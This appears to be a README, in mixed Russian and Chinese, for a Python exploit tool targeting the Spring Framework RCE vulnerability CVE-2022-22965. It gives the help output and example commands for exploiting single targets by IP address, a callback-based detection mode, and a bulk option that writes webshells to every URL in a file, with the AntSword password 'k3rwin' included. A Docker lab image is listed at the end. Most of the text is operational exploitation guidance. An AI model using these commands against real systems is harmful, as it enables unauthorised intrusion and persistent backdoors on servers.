
Уязвимость RCE в Spring Framework CVE-2022-22965
Сфера влияния: Spring Framework и производные фреймворки на JDK>=9
Скрипт предназначен только для изучения. Автор не несет ответственности за любое другое использование.
pip3 install -r requirements.txt
$ python3 spring-core-rce.py -h
.----..-.-. .---. .-..-. .-..----. .----. .---. .---. .----. .---. .----..----.
{ {__-`| } }}} }}_}{ || \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} }| |-' | } \ | }| }\ {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-' `-'-' `-'`-' `-'`----' `----' `---' `-'-' `----' `-'-' `----'`----'
Spring framework Core RCE
By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]
Spring framework Core 0day RCE 帮助指南
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL 指定url
-s SYSTEM, --system SYSTEM
指定目标主机操作系统,默认linux,参数为win/linux
-r FILE, --file FILE 指定url文件,批量写马
Неразрушающее обнаружение
-u,--url или используйте -f,--file для массового сканирования
-c,--check, укажите собственный HTTP-сервер, можно быстро создать веб-сервер с помощью
python3 -m http.server 80В основном используется во внутренней сети, когда требуется неразрушающее обнаружение уязвимости.
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"

Используйте -u, чтобы указать URL, -s, чтобы указать ОС. Параметры: linux или win, по умолчанию linux.
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"


Используйте -r для массовой записи шелл-кода, подключение через AntSword, пароль: k3rwin.
python3 spring-core-rce.py -r "urls.txt"


docker pull vulfocus/spring-core-rce-2022-03-29:latest
docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29